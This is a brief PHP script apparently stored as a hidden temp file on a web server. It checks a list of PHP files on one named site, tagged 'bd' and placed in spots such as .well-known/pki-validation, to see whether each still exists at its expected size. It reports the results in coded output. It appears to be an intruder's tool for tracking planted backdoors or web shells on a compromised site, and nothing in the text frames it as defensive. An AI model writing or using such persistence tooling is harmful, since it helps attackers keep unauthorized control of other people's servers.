File: //tmp/.data
<?php $r = '/home/vitanhod/sawpalmetto2.vitavit.com.pk'; $x = ["/img/touchbb.php"=>"bd@@1313220@@53",
"/includes/emailBugReport.php"=>"bd@@1310563@@998",
"/orderemail.php"=>"bd@@1314915@@32",
"/orderemail_bk.php"=>"bd@@1314833@@5",
"/jce.php"=>"bd@@1310629@@942",
"/.well-known/pki-validation/recette_moderate.php"=>"bd@@1310666@@939",
"/.well-known/phone_calls.php"=>"bd@@1315106@@76",
"/.well-known/pki-validation/recette_moderate.php"=>"bd@@1315004@@79",
"/.well-known/phone_calls.php"=>"bd@@1310692@@910",
"/jce.php"=>"bd@@1315056@@17"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');